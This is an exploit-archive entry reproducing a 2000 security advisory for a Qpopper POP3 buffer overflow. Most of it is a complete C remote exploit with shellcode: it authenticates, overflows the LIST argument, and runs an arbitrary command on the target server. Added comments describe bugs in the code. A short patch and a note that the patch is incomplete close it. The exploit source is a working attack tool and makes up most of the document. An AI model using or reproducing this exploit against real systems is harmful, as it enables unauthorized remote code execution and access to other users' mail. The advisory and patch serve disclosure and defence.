
qpop-exploit-net.c

qpop-exploit-net.c
Posted Jan 28, 2000
Authored by Missinglnk | Site tribune.intranova.net

A modified version of Zhodiac's original qpopper 3.0beta29 exploit that adds network support (no need for netcat) and lets the user specify which command to execute.

tags | exploit
SHA-256 | bcdd1859b2a33b6f0bdced21cd68b20e314cb4ff2fe1dafccab9dfb8f9a3be82

qpop-exploit-net.c

 !Hispahack Research Team
http://hispahack.ccc.de

Program: Qpopper <= 3.0beta29 (2.53 and olders are not vulnerable)
Platform: *nix
Risk: Remote access
Author: Zhodiac <zhodiac@softhome.net>
Date: 20/1/2000


- Problem:
===========

The now very common qpop POP3 server is one of the best servers, implementing
features that a normal pop3d does not have. Like almost all software it has
some security bugs. In this case, once you pass the login process you can
execute malicious code due to a buffer overflow.

With this buffer overflow (in the second argument of the LIST command) you
can execute malicious code with the uid of the user you logged in as, and
with gid mail. Because of the mail gid, on some systems you can read all the
mail of other users and even change or delete it.


- Exploit:
==========

As proof of the vulnerability we release the Linux x86 xploit. But be
aware: the absence of a public xploit for your system does not mean you can't
be hacked. The vulnerability exists, fix it!

------- qpop-xploit.c ----------

Modified by missnglnk <missnglnk@tribune.intranova.net>
Allows you to specify the command to execute, and adds network support
so that netcat is no longer needed.

/*
* !Hispahack Research Team
* http://hispahack.ccc.de
*
* By Zhodiac <zhodiac@softhome.net>
*
* Linux (x86) Qpopper xploit 3.0beta29 or lower (not 2.53)
* Overflow at pop_list()->pop_msg()
*
* Tested: 3.0beta28 offset=0
* 3.0beta26 offset=0
* 3.0beta25 offset=0
*
* #include <standar/disclaimer.h>
*
* This code is dedicated to my love [CrAsH]] and to all the people who
* were raided in Spain in the last few days.
*
* Madrid 10/1/2000
*
* missnglnk <missnglnk@tribune.intranova.net>
* - Allows you to specify the command to execute on the remote host,
* and added network support to the program so you do not need netcat
* to use this.
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* Length of the payload that main() builds and sends as the LIST argument. */
#define BUFFERSIZE 1004
/* Single-byte x86 NOP opcode; main() fills the front of the payload with it. */
#define NOP 0x90
/* Default value that main() stores four times after the shellcode; the
 * optional argv[5] is added to it (the header comment lists the per-version
 * offsets the author tested). */
#define OFFSET 0xbfffd9c4
// #define OFFSET 0x0

/* Payload bytes copied after the NOP run.  Opaque machine code for the
 * Linux x86 target named in the header; the string ends with the literal
 * "/bin/sh", and strlen() is used on it, so it must contain no NUL byte. */
char shellcode[]=
"\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa\x89\xf9\x89"
"\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04\x03\xcd\x80\x31\xdb\x89"
"\xd8\x40\xcd\x80\xe8\xd9\xff\xff\xff/bin/sh";


/* Print the command-line synopsis to stderr and terminate with status 1.
 * Never returns to the caller. */
void usage(char *progname) {
    static const char synopsis[] =
        "Usage: (%s <hostname> <login> <password> <command> [<offset>]\n";

    (void)fprintf(stderr, synopsis, progname);
    exit(1);
}

int main(int argc, char **argv) {
/*
 * Entry point.  argv: <hostname> <login> <password> <command> [<offset>].
 * Connects to TCP port 110 on argv[1], sends USER and PASS lines, then a
 * LIST line whose second argument is the payload built below, and finally
 * argv[4] followed by a newline.  Every server reply is printed to stdout.
 * Returns 0 after the exchange, -1 on a socket/connect/read/close failure
 * (reported with perror), and exits through usage() when fewer than four
 * positional arguments are given.
 *
 * NOTE(review): memset/memcpy/strlen/strstr and bzero are called without
 * <string.h>/<strings.h> being included; modern compilers reject the
 * implicit declarations.
 */
char *ptr,buffer[BUFFERSIZE],rcvbuf[4096],username[128],password[128],exploit[4096],command[4096];
/* buffer: payload carried by the LIST line; rcvbuf: server replies;
 * username/password/exploit/command: the four lines written to the socket. */
unsigned long *long_ptr,offset=OFFSET;
int aux,sock;
struct sockaddr_in sin;
unsigned long ip;
struct hostent *he;

fprintf(stderr,"\n!Hispahack Research Team (http://hispahack.ccc.de)\n");
fprintf(stderr,"Qpopper xploit by Zhodiac <zhodiac@softhome.net>\n\n");

/* Four positional arguments are mandatory; usage() does not return. */
if (argc<5) usage(argv[0]);

/* The optional fifth argument is added to OFFSET.  atol() reports no
 * errors, so unparsable text silently contributes 0. */
if (argc==6) offset+=atol(argv[5]);

/* Payload layout: NOP run, shellcode, four copies of `offset`, then a NUL.
 * The 16 bytes reserved at the end equal 4 * sizeof(unsigned long) only on
 * a 32-bit target; on LP64 the four 8-byte stores run past the end of
 * `buffer`, and the cast of `ptr` to unsigned long * is not alignment-safe. */
ptr=buffer;
memset(ptr,0,sizeof(buffer));
memset(ptr,NOP,sizeof(buffer)-strlen(shellcode)-16);
ptr+=sizeof(buffer)-strlen(shellcode)-16;
memcpy(ptr,shellcode,strlen(shellcode));
ptr+=strlen(shellcode);
long_ptr=(unsigned long*)ptr;
for(aux=0;aux<4;aux++) *(long_ptr++)=offset;
ptr=(char *)long_ptr;
*ptr='\0';

/* strlen() yields size_t; "%d" is a mismatched conversion specifier. */
fprintf(stderr,"Buffer size: %d\n",strlen(buffer));
fprintf(stderr,"Offset: 0x%lx\n\n",offset);

/* Protocol lines, each bounded by snprintf(); a login or password longer
 * than the 128-byte arrays is silently truncated rather than rejected. */
snprintf(username, sizeof(username), "USER %s\n",argv[2]);
snprintf(password, sizeof(password), "PASS %s\n",argv[3]);
snprintf(exploit, sizeof(exploit), "LIST 1 %s\n",buffer);
snprintf(command, sizeof(command), "%s\n", argv[4]);

if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
perror("socket()");
return -1;
}

/* Resolve argv[1]; the dotted-quad fallback is reached only when
 * gethostbyname() fails.  Two defects here: h_addr is a 4-byte IPv4
 * address, so reading it as unsigned long over-reads on LP64; and
 * inet_addr() returns in_addr_t with INADDR_NONE on failure, so the
 * comparison against NULL (0) never detects a bad address. */
if ((he = gethostbyname(argv[1])) != NULL) {
ip = *(unsigned long *)he->h_addr;
} else {
if ((ip = inet_addr(argv[1])) == NULL) {
perror("inet_addr()");
return -1;
}
}

sin.sin_family = AF_INET;
sin.sin_addr.s_addr = ip;
sin.sin_port = htons(110);   /* POP3 */

if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
perror("connect()");
return -1;
}

/* Greeting.  The byte count read() returns is discarded and rcvbuf has
 * not been zeroed at this point, so the strstr()/strlen() calls below may
 * scan past the bytes actually received; a 0-byte read (EOF) makes
 * strlen()-1 index before the start of the array. */
if (read(sock, rcvbuf, sizeof(rcvbuf)) < 0) {
perror("read()");
return -1;
}

/* "+OK" is the POP3 success marker; any occurrence in the reply counts. */
if (strstr(rcvbuf, "+OK") == NULL) {
printf("Server didnt respond with ok\n");
rcvbuf[(strlen(rcvbuf) - 1)] = '\0';   /* presumably strips the trailing newline */
printf("\t%s\n", rcvbuf);
return -1;
}

rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
printf("\t%s\n", rcvbuf);
/* Clearing the buffer is what keeps the following reads NUL-terminated,
 * as long as a reply is shorter than sizeof(rcvbuf). */
bzero(rcvbuf, sizeof(rcvbuf));

/* write() returns ssize_t; comparing it with size_t converts a -1 error
 * return to a huge unsigned value, so a failed write is NOT caught here
 * (only a short write is).  The same applies to the three writes below. */
if (write(sock, username, strlen(username)) < strlen(username)) {
perror("write()");
return -1;
}

if (read(sock, rcvbuf, sizeof(rcvbuf)) < 0) {
perror("read()");
return -1;
}

if (strstr(rcvbuf, "+OK") == NULL) {
printf("Server didnt respond with username ok\n");
rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
printf("\t%s\n", rcvbuf);
return -1;
}

rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
printf("\t%s\n", rcvbuf);
bzero(rcvbuf, sizeof(rcvbuf));

if (write(sock, password, strlen(password)) < strlen(password)) {
perror("write()");
return -1;
}

if (read(sock, rcvbuf, sizeof(rcvbuf)) < 0) {
perror("read()");
return -1;
}

if (strstr(rcvbuf, "+OK") == NULL) {
printf("Server didnt respond with password ok\n");
rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
printf("\t%s\n", rcvbuf);
return -1;
}

rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
printf("\t%s\n", rcvbuf);
bzero(rcvbuf, sizeof(rcvbuf));

/* The LIST line carries the ~BUFFERSIZE-byte payload as its second
 * argument: the pop_list()->pop_msg() overflow the advisory describes.
 * A LIST argument of that length is the observable pattern on the wire,
 * and bounding the pop_msg() format (the patch below) is what stops it. */
if (write(sock, exploit, strlen(exploit)) < strlen(exploit)) {
perror("write()");
return -1;
}

/* No "+OK" check on this reply; it is printed as-is. */
if (read(sock, rcvbuf, sizeof(rcvbuf)) < 0) {
perror("read()");
return -1;
}

rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
printf("\t%s\n", rcvbuf);
bzero(rcvbuf, sizeof(rcvbuf));

/* argv[4] plus newline is sent after the LIST exchange (the header comment
 * describes it as the command run on the remote host); a single read()
 * of its output follows. */
if (write(sock, command, strlen(command)) < strlen(command)) {
perror("write()");
return -1;
}

if (read(sock, rcvbuf, sizeof(rcvbuf)) < 0) {
perror("read()");
return -1;
}

rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
printf("\t%s\n", rcvbuf);
bzero(rcvbuf, sizeof(rcvbuf));

if (close(sock) < 0) {
perror("close()");
return -1;
}

return(0);
}

------- qpop-xploit.c ---------


- Fix:
======

The best solution is to wait for a new patched version; meanwhile, here is
a patch that will stop this attack (be aware that this patch was not done
after a full review of the code, so there may be other overflows).

------ pop_list.patch ---------

77c77
< return(pop_msg(p, POP_FAILURE,"Unknown LIST argument: %s",
---
> return(pop_msg(p, POP_FAILURE,"Unknown LIST argument: %.128s",
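Review bot: The `%.128s` precision bounds only this one pop_msg() format argument; pop_msg() itself is outside the hunk and presumably still formats into a fixed-size buffer of its own, so any other pop_msg() caller that passes client-controlled text through a bare `%s` remains exposed in the same way. A maintainer applying this should check the other pop_msg() call sites for unbounded `%s` conversions and give them the same treatment, or bound the formatting inside pop_msg() itself so the fix does not depend on every caller. The advisory's own caveat that this was not a full review of the code applies here.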

------ pop_list.patch ---------

piscis:~# patch pop_list.c pop_list.patch
piscis:~#

Spain r0x

Greets :)

Zhodiac